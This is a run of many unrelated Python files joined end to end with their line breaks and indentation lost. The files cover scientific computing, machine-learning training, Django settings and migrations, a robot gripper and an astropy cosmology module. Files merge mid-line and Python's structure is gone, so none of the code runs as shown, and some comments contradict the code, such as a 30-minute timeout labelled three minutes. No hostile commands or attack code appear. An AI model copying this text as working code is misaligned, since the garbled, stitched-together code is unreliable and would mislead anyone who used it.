dict_vo_element['Status'].lower() == 'production' and dict_vo_element['Name'] != '': vos.append(dict_vo_element['Name']) else: logger.error("%s: Error synchronizing VO due to invalid VO " "card" % schema.upper()) continue voindb = set([vo.name for vo in models.VO.objects.all()]) svos = set([vo for vo in vos]) if voindb != svos: try: if len(svos.difference(voindb)) > 0: for vo in svos.difference(voindb): models.VO.objects.create(name=vo) logger.info( "%s: Added %d VO" % (schema.upper(), len(svos.difference(voindb))) ) if len(voindb.difference(svos)) > 0: for vo in voindb.difference(svos): models.VO.objects.filter(name=vo).delete() logger.info( "%s: Deleted %d VO" % (schema.upper(), len(voindb.difference(svos))) ) except Exception as e: logger.error( "%s: database operations failed - %s" % (schema.upper(), e) ) else: logger.info("%s: VO database is up to date" % schema.upper()) main() # file gunicorn.conf.py # coding=utf-8 # Reference: https://github.com/benoitc/gunicorn/blob/master/examples/example_config.py import os _ROOT = os.path.abspath(os.path.join( os.path.dirname(__file__), '..')) timeout = 30 * 60 # 3 minutes keepalive = 24 * 60 * 60 # 1 day capture_output = Trueimport unittest from datetime import datetime import pyspark.sql.types as T from atc.spark import Spark from atc.transformations import join_time_series_dataframes class TestFunctions(unittest.TestCase): def test_join_time_series_dataframes(self): spark = Spark.master("local[*]").get() df1Schema = T.StructType([ T.StructField("Id", T.LongType(), True), T.StructField("Name", T.StringType(), True), T.StructField("StartTimestamp", T.TimestampType(), True), T.StructField("EndTimestamp", T.TimestampType(), True), T.StructField("State", T.StringType(), True) ]) df1Data = [ (1, "TestName", datetime(year=2020, month=1, day=1, hour=0), datetime(year=2020, month=1, day=2, hour=0), "state1"), (1, "TestName", datetime(year=2020, month=1, day=2, hour=0), datetime(year=2020, month=1, day=3, hour=0), "state2"), (1, "TestName", datetime(year=2020, month=1, day=3, hour=0), datetime(year=2020, month=1, day=4, hour=0), "state1") ] df2Schema = T.StructType([ T.StructField("Id", T.LongType(), True), T.StructField("StartTimestamp", T.TimestampType(), True), T.StructField("EndTimestamp", T.TimestampType(), True), T.StructField("State", T.StringType(), True) ]) df2Data = [ (1, datetime(year=2020, month=1, day=1, hour=6), datetime(year=2020, month=1, day=1, hour=8), "state3"), (1, datetime(year=2020, month=1, day=1, hour=10), datetime(year=2020, month=1, day=1, hour=12), "state3"), (1, datetime(year=2020, month=1, day=1, hour=20), datetime(year=2020, month=1, day=2, hour=4), "state4"), (1, datetime(year=2020, month=1, day=2, hour=6), datetime(year=2020, month=1, day=2, hour=8), "state3"), (1, datetime(year=2020, month=1, day=2, hour=10), datetime(year=2020, month=1, day=2, hour=12), "state3"), ] dfExpectedData = [ (1, "TestName", datetime(year=2020, month=1, day=1, hour=0), datetime(year=2020, month=1, day=1, hour=6), "state1"), (1, "TestName", datetime(year=2020, month=1, day=1, hour=6), datetime(year=2020, month=1, day=1, hour=8), "state3"), (1, "TestName", datetime(year=2020, month=1, day=1, hour=8), datetime(year=2020, month=1, day=1, hour=10), "state1"), (1, "TestName", datetime(year=2020, month=1, day=1, hour=10), datetime(year=2020, month=1, day=1, hour=12), "state3"), (1, "TestName", datetime(year=2020, month=1, day=1, hour=12), datetime(year=2020, month=1, day=1, hour=20), "state1"), (1, "TestName", datetime(year=2020, month=1, day=1, hour=20), datetime(year=2020, month=1, day=2, hour=4), "state4"), (1, "TestName", datetime(year=2020, month=1, day=2, hour=4), datetime(year=2020, month=1, day=2, hour=6), "state2"), (1, "TestName", datetime(year=2020, month=1, day=2, hour=6), datetime(year=2020, month=1, day=2, hour=8), "state3"), (1, "TestName", datetime(year=2020, month=1, day=2, hour=8), datetime(year=2020, month=1, day=2, hour=10), "state2"), (1, "TestName", datetime(year=2020, month=1, day=2, hour=10), datetime(year=2020, month=1, day=2, hour=12), "state3"), (1, "TestName", datetime(year=2020, month=1, day=2, hour=12), datetime(year=2020, month=1, day=3, hour=0), "state2"), (1, "TestName", datetime(year=2020, month=1, day=3, hour=0), datetime(year=2020, month=1, day=4, hour=0), "state1") ] # Construct dataframes df1 = spark.createDataFrame(df1Data, df1Schema) df2 = spark.createDataFrame(df2Data, df2Schema) dfExpected = spark.createDataFrame(dfExpectedData, df1Schema) dfReturn = join_time_series_dataframes( dfPrimary=df1, dfSecondary=df2, startTimeColumnName="StartTimestamp", endTimeColumnName="EndTimestamp", idColumns=["Id"], stateColumn="State", ) self.assertEqual( dfExpected.orderBy("StartTimestamp").collect(), dfReturn.orderBy("StartTimestamp").collect(), ) if __name__ == "__main__": unittest.main()""" Adapted from a Java code in the "Refactoring" book by . Replace temp with query Code snippet. Not runnable. """ def get_price(quantity, item_price): """Gets the total price of a purchace given the quantiy and the items price""" base_price = quantity * item_price discount_factor = get_discount_factor(base_price) return base_price * discount_factor def get_discount_factor(base_price): """Gets the discount facort for a given base price""" return 0.95 if base_price > 1000 else 0.98 1-10 import numpy as np import matplotlib.pyplot as plt import pickle ############################## data_file = 'data.pickle' def data_load(): with open(data_file, 'rb') as f: return pickle.load(f) data = data_load() def print_plots_names(): for pl in data['plots']: print(pl['name']) def plot_plot(p,lines=None,predict=None, save_as=None): fig = plt.figure() ax = fig.add_subplot(111) if p['ylim']: plt.ylim(0, p['ylim']) if not(lines): lines = list(range(p["no_lines"])) for line in lines: vals = p['lines'][line] if p['axis']=='progressive': x_vals = np.sqrt(np.prod(vals[:,0:6],axis=1)/10000) else: x_vals = vals[:,p['axis']] y_vals = vals[:, 6] ax.plot(x_vals, y_vals) if predict: p_vals = predict(vals) ax.plot(x_vals, p_vals,"k--") for (xs,ys,s) in p['text']: plt.text(xs,ys,s) ax.set_xlabel(p['x_axis_name']) ax.set_ylabel('Milliseconds') if save_as: plt.savefig(save_as, bbox_inches='tight') plt.show() ################## alpha flops ###################### # The function mypredict compute the alpha-flops correction accoridng to the formula given in the article # "Dissecting FLOPs along input dimensions for GreenAI cost estimations" accepted for presentation at the # the 7th International Online & Onsite Conference on Machine Learning, Optimization, and Data Science – # October 4 – 8, 2021 – Grasmere, Lake District, England – UK # we distinguish only two cases for K, namely K=1 and K>1. # if K=1, beta is 0.02 and gamma is .99 # if K>1, then beta is 0.001 and gamma is .56 # This values have been obtained by regression over the dataset def beta_gamma(K): Kis1 = K == 1 beta = Kis1 * 0.02 + (1 - Kis1) * 0.001 gamma = Kis1 * .99 + (1 - Kis1) * .56 return beta,gamma final = 0.0375 def mypredict(vals,print_prediction=False): D = np.prod(vals[:,0:2],axis=1) K = np.prod(vals[:,4:6],axis=1) C = np.prod(vals[:,2:4],axis=1) beta,gamma = beta_gamma(K) FLOPS = C * K * D / 1000000 #logK = tf.math.log(K) + 1 logK = np.log(K) +1 x = beta * (D - logK) x = (logK + x) / D #x = tf.math.log(x) x = np.log(x) x = gamma * x #x = final * tf.math.exp(x) x = final * np.exp(x) Ypred = x * FLOPS if print_prediction: for i in range(0,Ypred.shape[0]): print("predicted = {}; actual = {}".format(Ypred[i],vals[i,6])) return(Ypred) ################################################################# # Actual plotting. # Predictions are plotted with dashed lines plots = data["plots"] plot_plot(plots[0],predict=mypredict) #av,se_as="PLOTS/plot1") plot_plot(plots[1],predict=mypredict) #,save_as="PLOTS/plot2") plot_plot(plots[2],predict=mypredict) #,save_as="PLOTS/plot3") plot_plot(plots[3],predict=mypredict) #,save_as="PLOTS/plot4") #K=1 plot_plot(plots[4],predict=mypredict) #,save_as="PLOTS/plot5") plot_plot(plots[5],predict=mypredict) #,save_as="PLOTS/plot6_K1") #K=1 plot_plot(plots[6],predict=mypredict) #,save_as="PLOTS/plot11") plot_plot(plots[7],predict=mypredict) #,save_as="PLOTS/dense_vs_batch") #K = 1 from PyQt5.QtWidgets import QMainWindow, QApplication import cv2 import os import sys import json import datetime import numpy as np import skimage from mrcnn import visualize from mrcnn.visualize import display_instances ROOT_DIR = os.path.abspath("../../") sys.path.append(ROOT_DIR) from mrcnn.config import Config from mrcnn import model as modellib, utils COCO_WEIGHTS_PATH = os.path.join(ROOT_DIR,"mask_rcnn_coco.h5") DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR,"logs") class ExWindow(QMainWindow): def __init__(self): super().__init__() self.init_ui() def init_ui(self): self.setGeometry(300,300,400,300) self.setWindowTitle('Pig GUI') self.show() class PigConfig(Config): # Give the configuration a recognizable name NAME = "pig" # We use a GPU with 12GB memory, which can fit two images. # Adjust down if you use a smaller GPU. GPU_COUNT = 1 IMAGES_PER_GPU = 2 # Number of classes (including background) NUM_CLASSES = 1 + 2 # Background + objects # Number of training steps per epoch STEPS_PER_EPOCH = 300 # Skip detections with < 90% confidence DETECTION_MIN_CONFIDENCE = 0.9 def detect_and_color_splash(model, image_path=None, video_path=None, out_dir=''): assert image_path or video_path class_names = ['BG', 'standing_pig', 'lying_pig'] # Image or video? if image_path: # Run model detection and generate the color splash effect print("Running on {}".format(args.image)) # Read image image = skimage.io.imread(args.image) # Detect objects r = model.detect([image], verbose=1)[0] # Color splash and save visualize.display_instances(image, r['rois'], r['masks'], r['class_ids'], class_names, r['scores'],"image") file_name = "splash_{:%Y%m%dT%H%M%S}.png".format(datetime.datetime.now()) save_file_name = os.path.join(out_dir, file_name) elif video_path: # Video capture vcapture = cv2.VideoCapture(video_path) # width = int(vcapture.get(cv2.CAP_PROP_FRAME_WIDTH)) # height = int(vcapture.get(cv2.CAP_PROP_FRAME_HEIGHT)) width = 1600 height = 1600 fps = vcapture.get(cv2.CAP_PROP_FPS) # Define codec and create video writer file_name = "splash_{:%Y%m%dT%H%M%S}.wmv".format(datetime.datetime.now()) vwriter = cv2.VideoWriter(file_name, cv2.VideoWriter_fourcc(*'MJPG'), fps, (width, height)) count = 0 success = True #For video, we wish classes keep the same mask in frames, generate colors for masks colors = visualize.random_colors(len(class_names)) while success: print("frame: ", count) # Read next image plt.clf() plt.close() success, image = vcapture.read() if success: # OpenCV returns images as BGR, convert to RGB image = image[..., ::-1] # Detect objects r = model.detect([image], verbose=0)[0] # Color splash # splash = color_splash(image, r['masks']) splash = visualize.display_instances(image, r['rois'], r['masks'], r['class_ids'], class_names, r['scores'], colors=colors, making_video=True) # Add image to video writer vwriter.write(splash) count += 1 vwriter.release() print("Saved to ", file_name) if __name__ == '__main__': #app = QApplication(sys.argv) #ex = ExWindow() #sys.exit(app.exec_()) import argparse # Parse command line arguments parser = argparse.ArgumentParser( description='Train Mask R-CNN to detect lying,standing pigs') parser.add_argument('--weights', required=True, metavar="/home/simon/logs/weights.h5", help="Path to weights .h5 file or 'coco'") parser.add_argument('--logs', required=False, default=DEFAULT_LOGS_DIR, metavar="/path/to/logs/", help='Logs and checkpoints directory (default=logs/)') parser.add_argument('--image', required=False, metavar="path or URL to image", help='Image to apply the color splash effect on') parser.add_argument('--video', required=False, metavar="path or URL to video", help='Video to apply the color splash effect on') parser.add_argument('--subset', required=False, metavar="Dataset sub-directory", help="Subset of dataset to run prediction on") args = parser.parse_args() print("Weights: ", args.weights) #config class InferenceConfig(PigConfig): # Set batch size to 1 since we'll be running inference on # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 config = InferenceConfig() config.display() #make model model = modellib.MaskRCNN(mode="inference", config=config, model_dir=args.logs) #load weight path if args.weights.lower() == "coco": weights_path = COCO_WEIGHTS_PATH # Download weights file if not os.path.exists(weights_path): utils.download_trained_weights(weights_path) elif args.weights.lower() == "last": # Find last trained weights weights_path = model.find_last() else: weights_path = args.weights # Load weights print("Loading weights ", weights_path) if args.weights.lower() == "coco": # Exclude the last layers because they require a matching # number of classes model.load_weights(weights_path, by_name=True, exclude=[ "mrcnn_class_logits", "mrcnn_bbox_fc", "mrcnn_bbox", "mrcnn_mask"]) else: model.load_weights(weights_path, by_name=True) #evalutate detect_and_color_splash(model, image_path=args.image, video_path=args.video) #imports from pytorch_metric_learning import losses, miners, samplers, trainers, testers from pytorch_metric_learning.utils import common_functions import pytorch_metric_learning.utils.logging_presets as logging_presets import numpy as np import torchvision from torchvision import datasets, transforms import torch import torch.nn as nn from PIL import Image import logging import faiss import matplotlib.pyplot as plt from cycler import cycler import record_keeper import pytorch_metric_learning logging.getLogger().setLevel(logging.INFO) logging.info("VERSION %s"%pytorch_metric_learning.__version__) from record_keeper import RecordKeeper, RecordWriter # Set the image transforms train_transform = transforms.Compose([transforms.Resize(224), transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])]) val_transform = transforms.Compose([transforms.Resize(224), transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])]) # loading the data, creating three different sets train_dataset = datasets.ImageFolder('../dataset/train', transform=train_transform) val_dataset = datasets.ImageFolder('../dataset/val', transform=val_transform) test_dataset = datasets.ImageFolder('../dataset/test', transform=val_transform) # Model definition class MLP(nn.Module): # layer_sizes[0] is the dimension of the input # layer_sizes[-1] is the dimension of the output def __init__(self, layer_sizes, final_relu=False): super().__init__() layer_list = [] layer_sizes = [int(x) for x in layer_sizes] num_layers = len(layer_sizes) - 1 final_relu_layer = num_layers if final_relu else num_layers - 1 for i in range(len(layer_sizes) - 1): input_size = layer_sizes[i] curr_size = layer_sizes[i + 1] if i < final_relu_layer: layer_list.append(nn.ReLU(inplace=True)) layer_list.append(nn.Linear(input_size, curr_size)) self.net = nn.Sequential(*layer_list) self.last_linear = self.net[-1] #self.record_these = ["last_linear", "net"] def forward(self, x): return self.net(x) # Initialize models, optimizers and image transforms device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # Set trunk model and replace the softmax layer with an identity function trunk = torchvision.models.resnet18(pretrained=True) trunk_output_size = trunk.fc.in_features trunk.fc = common_functions.Identity() trunk = torch.nn.DataParallel(trunk.to(device)) # Set embedder model. This takes in the output of the trunk and outputs 64 dimensional embeddings embedder = torch.nn.DataParallel(MLP([trunk_output_size, 64]).to(device)) # Set optimizers (trying out different learnng rates) #trunk_optimizer = torch.optim.Adam(trunk.parameters(), lr=0.00001, weight_decay=0.0001) #embedder_optimizer = torch.optim.Adam(embedder.parameters(), lr=0.0001, weight_decay=0.0001) trunk_optimizer = torch.optim.Adam(trunk.parameters(), lr=0.0001, weight_decay=0.0001) embedder_optimizer = torch.optim.Adam(embedder.parameters(), lr=0.001, weight_decay=0.0001) # Create the loss, miner, sampler, and package them into dictionaries # Set the loss function loss = losses.TripletMarginLoss(margin=0.1) # Set the mining function miner = miners.TripletMarginMiner(margin=0.1, type_of_triplets="all") #miner = miners.MultiSimilarityMiner(epsilon=0.1) # Set the dataloader sampler # 4 samples each will be returned -> for us m=2 max sampler = samplers.MPerClassSampler(train_dataset.targets, m=2, length_before_new_iter=len(train_dataset)) #sampler = samplers.FixedSetOfTriplets(train_dataset.targets, len(train_dataset)) # Set other training parameters batch_size = 64 num_epochs = 1 # Package the above stuff into dictionaries. models = {"trunk": trunk, "embedder": embedder} optimizers = {"trunk_optimizer": trunk_optimizer, "embedder_optimizer": embedder_optimizer} loss_funcs = {"metric_loss": loss} mining_funcs = {"tuple_miner": miner} # Create the training and testing hooks record_keeper, _, _ = logging_presets.get_record_keeper("example_logs", "example_tensorboard") hooks = logging_presets.get_hook_container(record_keeper) dataset_dict = {"val": val_dataset} model_folder = "example_saved_models" # Create the tester tester = testers.GlobalEmbeddingSpaceTester(end_of_testing_hook = hooks.end_of_testing_hook, dataloader_num_workers = 32) end_of_epoch_hook = hooks.end_of_epoch_hook(tester, dataset_dict, model_folder, test_interval = 1, patience = 1) trainer = trainers.MetricLossOnly(models, optimizers, batch_size, loss_funcs, mining_funcs, train_dataset, sampler=sampler, dataloader_num_workers = 32, end_of_iteration_hook = hooks.end_of_iteration_hook, end_of_epoch_hook = end_of_epoch_hook) #Train the model trainer.train(num_epochs=num_epochs) PATH1 = './SentinelNaip_TripletMarginMiner_trunk.pth' PATH2 = './SentinelNaip_TripletMarginMiner_embed.pth' torch.save(trunk.state_dict(), PATH1) torch.save(embedder.state_dict(), PATH2) # Get a dictionary mapping from loss names to lists loss_histories = hooks.get_loss_history() test_dict = {"test": test_dataset} tester.test(epoch=num_epochs,dataset_dict=test_dict, trunk_model = trunk, embedder_model=embedder) # extract embeddings train_emb,train_lab = tester.get_all_embeddings(train_dataset,trunk_model = trunk, embedder_model=embedder) val_emb, val_lab = tester.get_all_embeddings(val_dataset, trunk_model = trunk, embedder_model=embedder) test_emb, test_lab = tester.get_all_embeddings(test_dataset, trunk_model = trunk, embedder_model=embedder) #The embeddings will be further used for visualisation and classification #Adapt this path to your own architecture np.savetxt('../embeddings/train_emb_triplet',train_emb) np.savetxt('../embeddings/train_lab_triplet',train_lab) np.savetxt('../embeddings/val_emb_triplet',val_emb) np.savetxt('../embeddings/val_lab_triplet',val_lab) np.savetxt('../embeddings/test_emb_triplet',test_emb) np.savetxt('../embeddings/test_lab_triplet',test_lab) evaluateBreakfastActions.py import numpy as np from sys import argv, exit from sklearn.metrics import jaccard_similarity_score, adjusted_rand_score, precision_score, f1_score, adjusted_rand_score, fowlkes_mallows_score from scipy import signal import matplotlib.pyplot as plt from os import listdir from os.path import isfile, join, isdir from math import factorial from collections import Counter from math import log from statsmodels.nonparametric.smoothers_lowess import lowess import warnings def warn(*args, **kwargs): pass warnings.warn = warn def movingaverage(interval, window_size): window = np.ones(int(window_size))/float(window_size) return np.convolve(interval, window, 'same') def savitzky_golay(y, window_size, order, deriv=0, rate=1): try: window_size = np.abs(np.int(window_size)) order = np.abs(np.int(order)) except ValueError, msg: raise ValueError("window_size and order have to be of type int") if window_size % 2 != 1 or window_size < 1: raise TypeError("window_size size must be a positive odd number") if window_size < order + 2: raise TypeError("window_size is too small for the polynomials order") order_range = range(order+1) half_window = (window_size -1) // 2 b = np.mat([[k**i for i in order_range] for k in range(-half_window, half_window+1)]) m = np.linalg.pinv(b).A[deriv] * rate**deriv * factorial(deriv) firstvals = y[0] - np.abs( y[1:half_window+1][::-1] - y[0] ) lastvals = y[-1] + np.abs(y[-half_window-1:-1][::-1] - y[-1]) y = np.concatenate((firstvals, y, lastvals)) return np.convolve( m[::-1], y, mode='valid') predFilePath = argv[1] gtFilePath = argv[2] predFiles = sorted([join(predFilePath, f) for f in listdir(predFilePath) if isfile(join(predFilePath, f)) and f.endswith('.txt')]) gtFiles = {} for gtFilePath1 in listdir(gtFilePath): if not isdir(join(gtFilePath, gtFilePath1)): continue # print gtFilePath1 for f in listdir(join(gtFilePath, gtFilePath1)): # print f if f.endswith('.coarse'): gtFiles[f.split('.')[0]] = join(gtFilePath, gtFilePath1, f) avgFrames = [] avgBoundaries = [] avgClasses = [] VoI = [] ARI = [] avgIoD = [] fps=30 winSize = np.ceil(fps/2) // 2 * 2 + 1 print winSize # print gtFiles numVideos=0 for predFile in predFiles: # if 'cereal' not in predFile: # continue numVideos += 1 vidKey = predFile.split('/')[-1].split('_')[:3] vidKey.pop(1) vidKey= '_'.join(vidKey) # print "\n\n", vidKey, predFile vidKey = vidKey.replace('salat', 'salad') vidKey = vidKey.replace('cereals', 'cereal') gtFile = gtFiles[vidKey] gtFrames = [] predFrames = [] predFrames1 = [] predErrors = [] avgFr = [] classNo = 0 BGClass = [] actBoundary = [] # print gtFile with open(gtFile, 'rb') as file: for line in file: # print line data, className = line.replace(' \n', '').replace(' ', '').split(' ') if className == 'SIL': BGClass.append(classNo) fromFrame,toFrame = [int(x) for x in data.split('-')] avgFr.append(toFrame - fromFrame) actBoundary.append(toFrame) # if toFrame - fromFrame == 0: # print gtFile, line for i in range(fromFrame, toFrame+1): gtFrames.append(classNo) classNo += 1 avgFrames.append(np.mean(avgFr)) with open(predFile, 'rb') as file: lineNo = 0 for line in file: data = line.replace('\n', '').split('\t') frameNo,predError = data frameNo, predError = int(frameNo), float(predError) predErrors.append(predError) # print predErrors predErrors_Ori = predErrors predErrors = movingaverage(predErrors, 80) predErrors = np.gradient(np.array(predErrors)).tolist() predBoundaries = signal.argrelextrema(np.array(predErrors), np.greater, order=int(0.57899*200))[0].tolist() predBoundaries.append(len(gtFrames)-1) prevFrame = 0 predClass = 0 for nextFrame in predBoundaries: for i in range(prevFrame, nextFrame): predFrames.append(predClass) prevFrame = nextFrame predClass += 1 if len(predFrames) < len(gtFrames): x = gtFrames[:len(predFrames)] y = predFrames else: x = gtFrames y = predFrames[:len(gtFrames)] TP = 0 FP = 0 TN = 0 FN = 0 ignoreClass = 0 d = {x:0 for x in range(classNo)} for i in range(len(y)): if y[i] >= classNo: ignoreClass += 1 if y[i] == x[i]: d[y[i]] += 1 TP += 1 else: FP += 1 p = [] for c,val in d.iteritems(): detNo = sum([1 for i in y if i == c]) if detNo == 0: continue p.append(1.0*val/detNo) p = np.mean(p) avgClasses.append(classNo) print predBoundaries, actBoundary, p avgIoD.append(p) print "MoF", np.mean(avgIoD) 0 # Generated by Django 3.2.4 on 2021-07-01 11:54 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('personal_list', '0002_remove_songlist_songs'), ] operations = [ migrations.AlterField( model_name='songrating', name='rating', field=models.CharField(choices=[('1', 'Appalling'), ('2', 'Horrible'), ('3', 'Very Bad'), ('4', 'Bad'), ('5', 'Average'), ('6', 'Fine'), ('7', 'Good'), ('8', 'Very Good'), ('9', 'Great'), ('10', 'Masterpiece')], default='5', max_length=2), ), ] config.py # mail imap_host = "imap.example.com" smtp_host = "smtp.example.cpm" mail_username = "username" sender = "" mail_passwd = r"password" # senders valid_sender = ("", "", ) valid_prefix = "fwthisfile" # output zipname = "myzip.zip" outsubject = "my_attachment" out_email_address = "" naotohori/cafysis #!/usr/bin/env python # coding: utf-8 # This program was originally coded by as simp.py import scipy import scipy.linalg import pylab import sys class nya(object): def __init__(self, coords, pdb_Bfactors): self.coords = coords self.pdb_Bfactors = pdb_Bfactors self.num_atoms = len(self.coords) def cmpt_graph_mats(self, cutoff=10.0): dist = scipy.linalg.norm self.adj_mat = scipy.zeros((self.num_atoms, self.num_atoms)) self.deg_mat = [0] * self.num_atoms for i in range(self.num_atoms - 1): for j in range(i + 1, self.num_atoms): if dist(self.coords[i, :] - self.coords[j, :]) <= cutoff: self.deg_mat[i] += 1.0 self.deg_mat[j] += 1.0 self.adj_mat[i, j] = 1.0 self.adj_mat[j, i] = 1.0 self.deg_mat = scipy.diag(self.deg_mat) self.lap_mat = self.deg_mat - self.adj_mat def cmpt_graph_eig(self): self.graph_eigval, self.graph_eigvec = scipy.linalg.eigh(self.lap_mat, self.deg_mat) def cmpt_hessian(self): self.hessian = scipy.zeros((3*self.num_atoms, 3*self.num_atoms)) for i in range(self.num_atoms - 1): for j in range(i + 1, self.num_atoms): v_ij = self.coords[j, :] - self.coords[i, :] d2 = sum(v_ij * v_ij) for a in range(3): for b in range(3): self.hessian[3*i + a, 3*j + b] = -v_ij[a] * v_ij[b] / d2 * self.adj_mat[i, j] self.hessian[3*j + b, 3*i + a] = self.hessian[3*i + a, 3*j + b] for i in range(self.num_atoms): for a in range(3): for b in range(a, 3): for j in range(self.num_atoms): if j != i: self.hessian[3*i + a, 3*i + b] += -self.hessian[3*i + a, 3*j + b] self.hessian[3*i + b, 3*i + a] = self.hessian[3*i + a, 3*i + b] def cmpt_en_eig(self): self.en_eigval, self.en_eigvec = scipy.linalg.eigh(self.hessian) def cmpt_inverse_hessian(self): self.inverse_hessian = scipy.linalg.pinv(self.hessian) def cmpt_Bfactors(self): Bfactors = [self.inverse_hessian[3*i,3*i] + self.inverse_hessian[3*i+1, 3*i+1] + self.inverse_hessian[3*i+2, 3*i+2] for i in range(self.num_atoms)] k = sum(self.pdb_Bfactors) / sum(Bfactors) self.Bfactors = [Bfactors[i] * k for i in range(self.num_atoms)] def cmpt_cross_correlation(self): self.cross_correlation = scipy.zeros((self.num_atoms, self.num_atoms)) self.norm_cross_correlation = scipy.zeros((self.num_atoms, self.num_atoms)) for i in range(self.num_atoms): for j in range(i, self.num_atoms): self.cross_correlation[i, j] = (self.inverse_hessian[3*i, 3*j] + self.inverse_hessian[3*i+1, 3*j+1] + self.inverse_hessian[3*i+2, 3*j+2]) self.cross_correlation[j, i] = self.cross_correlation[i, j] for i in range(self.num_atoms): for j in range(i, self.num_atoms): if i == j: self.norm_cross_correlation[i, i] = 1.0 else: self.norm_cross_correlation[i, j] = ( self.cross_correlation[i, j] / scipy.sqrt(self.cross_correlation[i, i] * self.cross_correlation[j, j])) self.norm_cross_correlation[j, i] = self.norm_cross_correlation[i, j] def get_lines(filename): lines = [] for line in open(filename): if (line[0:6] == "ATOM " and line[12:16] == " CA " and (line[16:17] == " " or line[16:17] == "A") and line[21:22] == "A"): lines.append(line) return lines def get_coords(lines): def ext_coords(line): try: x = float(line[30:38]) y = float(line[38:46]) z = float(line[46:54]) except ValueError: print("Invalid format(coords)") print(line) quit() return (x, y, z) return [ext_coords(line) for line in lines] def get_Bfactors(lines): def ext_Bfactors(line): try: b = float(line[60:66]) except ValueError: print("Invalid format(B-factors)") print(line) quit() return b return [ext_Bfactors(line) for line in lines] def plot_figs(): pylab.subplot(221, aspect="equal") X, Y = pylab.meshgrid(list(range(ins.num_atoms)), list(range(ins.num_atoms))) pylab.pcolor(X, Y, ins.norm_cross_correlation) pylab.colorbar() pylab.clim(-0.15, 0.15) pylab.title("Cross Correlations") pylab.subplot(222) pylab.plot(pdb_Bfactors, "bo-", label="ex.") pylab.plot(ins.Bfactors, "ro-", label="calc.") pylab.legend() pylab.xlabel("Residue") # pylab.ylabel("a.u.") pylab.title("B factors") pylab.grid() pylab.subplot(223, aspect="equal") X, Y = pylab.meshgrid(list(range(ins.num_atoms)), list(range(ins.num_atoms))) pylab.pcolor(X, Y, ins.adj_mat) pylab.colorbar() pylab.title("Adjacency Mat.") pylab.subplot(224) pylab.plot(ins.graph_eigvec[:, 1], "go-") pylab.xlabel("Residue") pylab.grid() pylab.show() if __name__ == "__main__": filename = sys.argv[1] lines = get_lines(filename) coords = scipy.array(get_coords(lines)) pdb_Bfactors = get_Bfactors(lines) ins = nya(coords, pdb_Bfactors) ins.cmpt_graph_mats() ins.cmpt_graph_eig() ins.cmpt_hessian() ins.cmpt_en_eig() ins.cmpt_inverse_hessian() ins.cmpt_Bfactors() ins.cmpt_cross_correlation() plot_figs() frc6879/Practice-Robot from wpilib.command import Subsystem from wpilib import Servo class Gripper (Subsystem): def __init__ (self, robot): self.robot = robot self.isOpen = True self.left_servo = Servo(3) self.right_servo = Servo(4) def open (self): self.left_servo.set(0.0) self.right_servo.set(1.0) def close (self): self.left_servo.set(0.5) self.right_servo.set(0.5) def toggle (self): (self.close, self.open)[self.isOpen]() 1-10 # -*- coding: utf-8 -*- from .base import * DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': '{}_local'.format(PROJECT_NAME), 'USER': 'postgres', 'PASSWORD': '', 'HOST': '', 'PORT': '', } } DEBUG = True ALLOWED_HOSTS = ['localhost', '127.0.0.1', '[::1]'] STATUS_PROJECT = 'local' EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend' INTERNAL_IPS = ['127.0.0.1'] INSTALLED_APPS += ('debug_toolbar',) DEBUG_TOOLBAR_PANELS = [ 'debug_toolbar.panels.versions.VersionsPanel', 'debug_toolbar.panels.timer.TimerPanel', 'debug_toolbar.panels.settings.SettingsPanel', 'debug_toolbar.panels.headers.HeadersPanel', 'debug_toolbar.panels.request.RequestPanel', 'debug_toolbar.panels.sql.SQLPanel', 'debug_toolbar.panels.staticfiles.StaticFilesPanel', 'debug_toolbar.panels.templates.TemplatesPanel', 'debug_toolbar.panels.cache.CachePanel', 'debug_toolbar.panels.signals.SignalsPanel', 'debug_toolbar.panels.logging.LoggingPanel', 'debug_toolbar.panels.redirects.RedirectsPanel', 'debug_toolbar.panels.profiling.ProfilingPanel', ] MIDDLEWARE += ( 'debug_toolbar.middleware.DebugToolbarMiddleware', 'querycount.middleware.QueryCountMiddleware' ) QUERYCOUNT = { 'THRESHOLDS': { 'MEDIUM': 20, 'HIGH': 50, 'MIN_TIME_TO_LOG': 0, 'MIN_QUERY_COUNT_TO_LOG': 0 }, 'IGNORE_REQUEST_PATTERNS': [r'^/admin/', r'^/media/'], 'IGNORE_SQL_PATTERNS': [], 'DISPLAY_DUPLICATES': 5, 'RESPONSE_HEADER': 'X-DjangoQueryCount-Count' } REST_FRAMEWORK['DEFAULT_AUTHENTICATION_CLASSES']\ .append('rest_framework.authentication.SessionAuthentication') x = int(input()) z = x - 1 i = 2 soma = x s=1 while z <= x: z = int(input()) while soma <= z: soma = soma + x + s if soma <= z: i = i + 1 s=s+1 print(i) # Licensed under a 3-clause BSD style license - see LICENSE.rst import sys import warnings from math import sqrt, pi, exp, log, floor from abc import ABCMeta, abstractmethod import numpy as np from .. import constants as const from ..config import ConfigurationItem from ..utils.misc import isiterable from ..utils.exceptions import AstropyUserWarning from .. import units as u from . import parameters # Originally authored by (), # and modified by () and (). # Many of these adapted from Hogg 1999, astro-ph/9905116 # and Linder 2003, PRL 90, 91301 __all__ = ["FLRW", "LambdaCDM", "FlatLambdaCDM", "wCDM", "FlatwCDM", "Flatw0waCDM", "w0waCDM", "wpwaCDM", "w0wzCDM", "get_current", "set_current", "WMAP5", "WMAP7", "WMAP9", "Planck13"] __doctest_requires__ = {'*': ['scipy.integrate']} # Constants # Mpc in km Mpc_km = (1 * u.Mpc).to(u.km) arcsec_in_radians = 1 / 3600. * pi / 180 arcmin_in_radians = 1 / 60. * pi / 180 # Radiation parameter over c^2 in cgs a_B_c2 = 4 * const.sigma_sb.cgs.value / const.c.cgs.value ** 3 # Boltzmann constant in eV / K kB_evK = const.k_B.decompose().to(u.eV / u.K) DEFAULT_COSMOLOGY = ConfigurationItem( 'default_cosmology', 'no_default', 'The default cosmology to use. Note this is only read on import, ' 'so changing this value at runtime has no effect.') class CosmologyError(Exception): 